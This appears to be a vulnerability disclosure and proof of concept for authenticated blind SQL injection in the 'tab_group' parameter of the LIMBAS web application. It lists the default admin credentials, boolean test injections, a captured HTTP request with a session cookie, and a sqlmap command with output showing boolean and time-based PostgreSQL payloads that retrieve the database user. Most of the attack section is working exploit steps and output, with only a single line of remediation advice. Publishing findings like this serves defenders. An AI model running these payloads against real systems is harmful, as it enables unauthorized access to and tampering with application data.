Vendor Homepage: https://www.limbas.com/en/
Github Link: https://github.com/limbas/limbas
Tested on:Kali Linux+ Apache 2.4.57+PHP 8.2.13(https://hub.docker.com/r/limbas/limbas)
After logging in(default:admin/limbas), on the "/main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2" page, the parameter "tab_group" has the risk of blind SQL injection. It is recommended to take defensive measures such as input validation or parameterized query for SQL statements. Exploiting this vulnerability could enable an attacker to take control of the application, alter or access data, or leverage recent vulnerabilities present in the underlying database.(https://github.com/limbas/limbas/blob/master/src/limbas_src/main_admin.php)
After logging in, go to this address:localhost/main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2
- Firstly, by injecting "1+and+1=1" after "tab_group", the response is normal.
- After injecting "1+and+1=2" following "tab_group", there is a different response.
- Use Burpsuit to intercept this request, copy the request and paste it into the "sqlinjection.txt" file.
GET /main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: LMB_SESS_ID=h2i9p2if9lq5trnkmor49qs698
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
- Using sqlmap to extract data can be successful.
sqlmap -r sqlinjection.txt --batch --current-user
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tab_group (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=setup_gtab_ftype&group_bzm=&tab_group=1 AND 5959=5959&atid=2
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: action=setup_gtab_ftype&group_bzm=&tab_group=1 AND 4788=(SELECT 4788 FROM PG_SLEEP(5))&atid=2
---
[02:26:32] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian
web application technology: PHP 8.2.13, Apache 2.4.57
back-end DBMS: PostgreSQL
[02:26:32] [INFO] fetching current user
[02:26:32] [INFO] resumed: limbasuser
current user: 'limbasuser'